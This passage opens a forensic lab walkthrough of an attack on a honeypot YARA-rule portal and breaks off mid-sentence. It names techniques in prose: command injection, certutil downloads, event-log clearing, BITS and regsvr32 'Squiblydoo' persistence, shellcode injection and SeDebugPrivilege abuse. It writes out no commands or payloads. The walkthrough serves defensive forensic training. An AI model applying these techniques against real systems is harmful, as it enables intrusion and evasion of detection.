This walkthrough provides a comprehensive forensic analysis of an insider threat incident on a honeypot system designed to simulate a secure YARA rule testing portal. The investigation traces the complete attack lifecycle, from initial access via a web vulnerability to persistence, privilege escalation, and lateral movement. Our mission is to dissect the forensic artifacts provided to uncover the attacker's tactics, techniques, and procedures (TTPs).
The threat actor demonstrates a proficient use of "Living off the Land" (LotL) techniques, leveraging native Windows binaries and scripts to achieve their objectives while minimizing their footprint. The attack begins with the exploitation of a command injection vulnerability in the web portal's PHP source code. Following initial access, the actor performs reconnaissance using standard utilities like `whoami`, `tasklist`, and `ping` to understand the compromised environment. Defense evasion is a key theme, with the attacker using `certutil.exe` to download payloads, `wevtutil.exe` to clear event logs, and masquerading a well-known lateral movement tool to avoid detection.
A notable feature of this intrusion is the sophisticated, multi-stage persistence mechanism. The attacker establishes a foothold using a BITS job (T1197), which in turn leverages `regsvr32.exe` to execute a remote scriptlet—a technique known as "Squiblydoo" (T1218.010). This triggers a periodically executed, obfuscated PowerShell script that ultimately injects shellcode into memory. The investigation also uncovers the attacker's method for privilege escalation, which involves abusing the `SeDebugPrivilege` to gain SYSTEM-level access.
Throughout this analysis, we will systematically examine a range of forensic artifacts using industry-standard tools, including PECmd, MFTECmd, BitsParser, Timeline Explorer, and CyberChef. By correlating data from web server l